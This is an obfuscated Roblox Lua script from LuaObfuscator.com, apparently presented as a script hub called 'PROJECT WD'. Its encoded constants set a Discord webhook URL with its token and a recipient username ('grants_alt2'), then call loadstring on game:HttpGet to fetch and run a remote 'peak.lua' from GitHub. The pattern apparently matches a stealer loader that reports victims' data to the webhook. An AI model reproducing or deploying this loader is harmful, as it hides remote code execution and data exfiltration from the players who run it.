--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=v1(v16,v19,v19);v19=v19 + 1 ;return v31;end v23=nil;function v23()local v32,v33=v1(v16,v19,v19 + (5 -3) );v19=v19 + (5 -3) ;return (v33 * (493 -237)) + v32 ;end v18=3;end if (v18==4) then function v25()local v34=v24();local v35=v24();local v36=2 -1 ;local v37=(v21(v35,620 -(555 + 64) ,20) * (2^32)) + v34 ;local v38=v21(v35,952 -(857 + 74) ,599 -((874 -507) + 201) );local v39=((v21(v35,959 -(214 + 713) )==((1 -0) + 0)) and  -1) or (1 + 0) ;if (v38==(877 -(282 + 595))) then if (v37==0) then return v39 * (1637 -(1523 + 114)) ;else local v87=0 + (0 -0) ;while true do if ((0 -(350 -(87 + 263)))==v87) then v38=(1246 -(67 + 113)) -(50 + 18 + 997) ;v36=1270 -(226 + 1044) ;break;end end end elseif (v38==(8913 -6866)) then return ((v37==0) and (v39 * (1/(117 -(32 + 85))))) or (v39 * NaN) ;end return v8(v39,v38-((2462 -1459) + 20) ) * (v36 + (v37/((1 + 1)^(1009 -(892 + 48 + 17))))) ;end v26=nil;function v26(v40)local v41=0 -0 ;local v42;local v43;while true do if (v41==((2161 -1208) -(802 + 150))) then v42=v3(v16,v19,(v19 + v40) -(2 -1) );v19=v19 + v40 ;v41=3 -1 ;end if (v41==(2 + 0)) then v43={};for v88=998 -(915 + 82) , #v42 do v43[v88]=v2(v1(v3(v42,v88,v88)));end v41=8 -5 ;end if (v41==(2 + 1)) then return v6(v43);end if (v41==(0 -0)) then v42=nil;if  not v40 then v40=v24();if (v40==(1187 -(1069 + (257 -139)))) then return "";end end v41=1;end end end v18=5;end if (v18==6) then v29=nil;function v29()local v44=0 -0 ;local v45;local v46;local v47;local v48;local v49;local v50;while true do if (v44~=1) then else v49=v24();v50={};for v90=1 + 0 ,v49 do local v91=0;local v92;local v93;local v94;while true do if (v91==(886 -(261 + 624))) then v94=nil;while true do if (v92==(0 -0)) then local v112=1080 -(1020 + 60) ;while true do if (v112==(1423 -(630 + 793))) then v93=v22();v94=nil;v112=1;end if (v112==(3 -2)) then v92=4 -3 ;break;end end end if (v92~=(1 + 0)) then else if (v93==(3 -2)) then v94=v22()~=(1747 -(760 + 987)) ;elseif (v93==(1915 -(1789 + 124))) then v94=v25();elseif (v93~=(769 -(745 + 21))) then else v94=v26();end v50[v90]=v94;break;end end break;end if (v91==0) then v92=0;v93=nil;v91=1 + 0 ;end end end v48[3]=v22();v44=5 -3 ;end if ((7 -5)~=v44) then else for v95=1,v24() do local v96=0;local v97;while true do if (v96~=0) then else v97=v22();if (v21(v97,1,1 + 0 )~=0) then else local v107=0 + 0 ;local v108;local v109;local v110;local v111;while true do if (v107==(1056 -(87 + 968))) then v110=nil;v111=nil;v107=2;end if (v107~=(8 -6)) then else while true do if (v108~=3) then else if (v21(v110,3 + 0 ,3)==(2 -1)) then v111[4]=v50[v111[1417 -(447 + 966) ]];end v45[v95]=v111;break;end if (v108==2) then local v159=0 -0 ;while true do if (v159~=(1818 -(1703 + 114))) then else v108=704 -(376 + 325) ;break;end if (v159==(0 -0)) then if (v21(v110,2 -1 ,1 + 0 )==1) then v111[4 -2 ]=v50[v111[2]];end if (v21(v110,2,2)~=1) then else v111[17 -(9 + 5) ]=v50[v111[3]];end v159=377 -(85 + 291) ;end end end if (v108==(1265 -(243 + 1022))) then local v160=0;while true do if (v160~=(0 -0)) then else v109=v21(v97,2 + 0 ,3);v110=v21(v97,1184 -(1123 + 57) ,6);v160=1;end if (v160~=(1 + 0)) then else v108=1;break;end end end if (v108==1) then local v161=0;while true do if (v161==1) then v108=256 -(163 + 91) ;break;end if (v161==0) then v111={v23(),v23(),nil,nil};if (v109==(0 + 0)) then local v177=0;while true do if (v177~=(0 -0)) then else v111[3 + 0 ]=v23();v111[1478 -(1329 + 145) ]=v23();break;end end elseif (v109==1) then v111[3]=v24();elseif (v109==(973 -(140 + 831))) then v111[3]=v24() -(2^16) ;elseif (v109==(1853 -(1409 + 441))) then local v182=0;local v183;while true do if (v182~=0) then else v183=718 -(15 + 703) ;while true do if (v183~=(0 + 0)) then else v111[3]=v24() -((440 -(262 + 176))^16) ;v111[1725 -(345 + 1376) ]=v23();break;end end break;end end end v161=1;end end end end break;end if (v107==0) then v108=0;v109=nil;v107=1;end end end break;end end end for v98=1,v24() do v46[v98-1 ]=v29();end return v48;end if (v44~=(688 -(198 + 490))) then else v45={};v46={};v47={};v48={v45,v46,nil,v47};v44=1207 -(696 + 510) ;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v51)if (v1(v51,2)==79) then v20=v0(v3(v51,1,1));return "";else local v80=v2(v0(v51,16));if v20 then local v100=v5(v80,v20);v20=nil;return v100;else return v80;end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v52=0 -0 ;local v53;local v54;local v55;local v56;while true do if (v52==(699 -(208 + 490))) then return (v56 * (16778478 -(1091 + 171))) + (v55 * (10547 + 54989)) + (v54 * (805 -(221 + 328))) + v53 ;end if (v52==(836 -(660 + 156 + 20))) then v53,v54,v55,v56=v1(v16,v19,v19 + (9 -6) );v19=v19 + (206 -(14 + 188)) ;v52=375 -(123 + 251) ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v57,v58,v59)local v60=v57[1];local v61=v57[2];local v62=v57[3];return function(...)local v66=v60;local v67=v61;local v68=v62;local v69=v28;local v70=1;local v71= -1;local v72={};local v73={...};local v74=v12("#",...) -1 ;local v75={};local v76={};for v81=0,v74 do if (v81>=v68) then v72[v81-v68 ]=v73[v81 + 1 ];else v76[v81]=v73[v81 + 1 ];end end local v77=(v74-v68) + 1 ;local v78;local v79;while true do local v82=0;while true do if (v82==1) then if (v79<=5) then if (v79<=2) then if (v79<=0) then v76[v78[2]]=v59[v78[3]];elseif (v79>1) then local v124=v78[2];local v125,v126=v69(v76[v124](v13(v76,v124 + 1 ,v78[3])));v71=(v126 + v124) -1 ;local v127=0;for v153=v124,v71 do local v154=0;while true do if (v154==0) then v127=v127 + 1 ;v76[v153]=v125[v127];break;end end end else v70=v78[3];end elseif (v79<=3) then v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v59[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v70=v78[3];elseif (v79==4) then v76[v78[2]]=v78[3];else local v131;local v132,v133;local v134;local v135;v76[v78[2]][v78[3]]=v78[4];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v59[v78[3]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v59[v78[3]];v70=v70 + 1 ;v78=v66[v70];v135=v78[2];v134=v76[v78[3]];v76[v135 + 1 ]=v134;v76[v135]=v134[v78[4]];v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]=v78[3];v70=v70 + 1 ;v78=v66[v70];v135=v78[2];v132,v133=v69(v76[v135](v13(v76,v135 + 1 ,v78[3])));v71=(v133 + v135) -1 ;v131=0;for v155=v135,v71 do v131=v131 + 1 ;v76[v155]=v132[v131];end v70=v70 + 1 ;v78=v66[v70];v135=v78[2];v76[v135]=v76[v135](v13(v76,v135 + 1 ,v71));v70=v70 + 1 ;v78=v66[v70];v76[v78[2]]();v70=v70 + 1 ;v78=v66[v70];v70=v78[3];end elseif (v79<=8) then if (v79<=6) then v76[v78[2]][v78[3]]=v78[4];elseif (v79==7) then do return;end else local v147=0;local v148;while true do if (v147==0) then v148=v78[2];v76[v148]=v76[v148](v13(v76,v148 + 1 ,v71));break;end end end elseif (v79<=9) then if (v76[v78[2]]==v78[4]) then v70=v70 + 1 ;else v70=v78[3];end elseif (v79==10) then v76[v78[2]]();else local v150=0;local v151;local v152;while true do if (v150==1) then v76[v151 + 1 ]=v152;v76[v151]=v152[v78[4]];break;end if (v150==0) then v151=v78[2];v152=v76[v78[3]];v150=1;end end end v70=v70 + 1 ;break;end if (v82==0) then v78=v66[v70];v79=v78[1];v82=1;end end end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v63,v64,v65)if v65 then local v83=(v63/((2 + 0)^(v64-(3 -2))))%((869 -(550 + 317))^(((v65-(1 -0)) -(v64-(1 -0))) + (2 -1))) ;return v83-(v83%(1 -0)) ;else local v84=0 + 0 ;local v85;while true do if (v84==((0 -0) + 0)) then v85=(398 -(115 + (2271 -(582 + 1408))))^(v64-1) ;return (((v63%(v85 + v85))>=v85) and (2 -(3 -2))) or (0 + 0) ;end end end end v22=nil;v18=2;end end end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31302O392O3134372O3934393435393439362F6D526C2D36786D3432516E6458654E386375335761516133716F314636357235516C4F553336446754624E4139475A6B7A34756E68576376726833764A5439455F5A6A4D030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030B3O006772616E74735F616C743203073O004875624E616D65030A3O0050524F4A45435420574400163O0012043O00013O0026093O000D000100020004013O000D000100122O000100033O00300500010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026093O0001000100010004013O0001000100122O000100033O0030030001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00073O00017O00",v9(),...);end
